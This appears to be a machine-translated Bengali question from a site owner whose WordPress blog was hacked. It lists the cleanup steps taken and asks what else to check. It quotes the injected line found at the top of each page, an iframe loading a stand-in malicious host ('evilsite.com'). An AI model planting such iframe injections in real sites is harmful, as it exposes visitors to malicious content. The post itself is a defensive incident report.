আমার জন্য মজাদার ওয়ার্ডপ্রেস ব্লগ http://fakeplasticrock.com (চলমান ওয়ার্ডপ্রেস 3.1.1) হ্যাক পেয়েছে - এটি <iframe>
প্রতিটি পৃষ্ঠায় এর মতো দেখাচ্ছে :
<iframe src="http://evilsite.com/go/1"></iframe>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
আমি নিম্নলিখিতটি করেছিলাম
- বিল্ট-ইন ওয়ার্ডপ্রেস আপগ্রেড সিস্টেমের মাধ্যমে 3.1.3 এ আপগ্রেড করা হয়েছে
- এক্সপ্লয়েট স্ক্যানার ইনস্টল করা হয়েছে (অস্বাভাবিক ফাইলগুলিতে প্রচুর সমালোচনা সতর্কতা) এবং অ্যান্টিভাইরাস (এটি সবুজ এবং পরিষ্কার দেখায়, তাই আমি চালানোর পরে এটি আনইনস্টল করে মুছে ফেলেছি)
- মাইএসকিউএল পাসওয়ার্ড পরিবর্তন করা হয়েছে।
- সমস্ত ওয়ার্ডপ্রেস ব্যবহারকারীর পাসওয়ার্ড পরিবর্তন করা হয়েছে।
- এফটিপি এর মাধ্যমে সংযুক্ত এবং পুরো ফাইল সিস্টেমটি ডাউনলোড করেছেন (বড় নয়, এটি কেবলমাত্র ওয়ার্ডপ্রেস-লিনাক্সের শেয়ার্ড হোস্ট)
- ওয়ার্ডপ্রেস 3.1.3 একটি সরকারী জিপ বিরুদ্ধে ফাইলসিস্টেম Diffed এবং মুছে বা অধিলিখন কিছু মেলেনি।
আমি এটা নিশ্চিত
- ডিস্কের সমস্ত ফাইল হ'ল অফিশিয়াল ওয়ার্ডপ্রেস ৩.১.৩ ফাইল
- আমার এক ব্যতীত ডিস্কে কোনও "অতিরিক্ত" ফাইল নেই
/theme
, এক্সপ্লোইট স্ক্যানার প্লাগইন (যা আমি সবেমাত্র ডাউনলোড করেছি),/uploads
ফোল্ডার এবং অন্যান্য প্রত্যাশিত ফাইলগুলির একটি ক্ষুদ্র পরিমাণ। আমার অন্যান্য প্লাগইন, ডাব্লুপি-রিপ্যাচচা, বর্তমান অফিসিয়াল ডাউনলোড সংস্করণটির সাথে মেলে। - আমি
.htaccess
ফাইলটিও যাচাই করেছিলাম এবং সেখানে কিছুই ভুল দেখাচ্ছে না
আমি ডাটাবেসটি স্পর্শ করি নি , তবে আমি এই ভেবে লড়াই করে যাচ্ছি যে এটিতে কাজ করার জন্য বিশেষ পিএইচপি কোড ব্যতীত ডাটাবেসের কোনও কিছু কীভাবে দূষিত হতে পারে ?
আমার ওয়ার্ডপ্রেস ব্লগ ঠিক আছে এবং এখন হ্যাক-ফ্রি প্রদর্শিত হবে (আমার মনে হয়), তবে আমার অন্য কিছু যাচাই করা উচিত?